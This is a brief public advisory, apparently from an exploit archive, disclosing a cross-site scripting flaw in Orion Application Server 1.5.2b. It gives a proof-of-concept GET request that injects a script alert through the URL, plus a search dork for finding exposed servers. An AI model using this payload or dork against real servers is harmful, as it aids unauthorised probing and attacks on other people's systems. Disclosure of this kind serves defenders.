Orion Application Server version 1.5.2b suffers from a cross site scripting vulnerability.
e8b76a130b9da2780fd376421f312812aed4091b14fe1f3ce24cacfde9bcbf57
# Orion Application Server - Cross Site Scripting
#
# Tested on: Orion Application Server 1.5.2b
# Date: Ago 09, 2020
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>
# Cross Site Scripting
# Poc:
GET http://x.x.x.x/%3Cscript%3Ealert(%22xss'ed%22)%3C/script%3E
# Dork: "Orion Application Server" "up and running"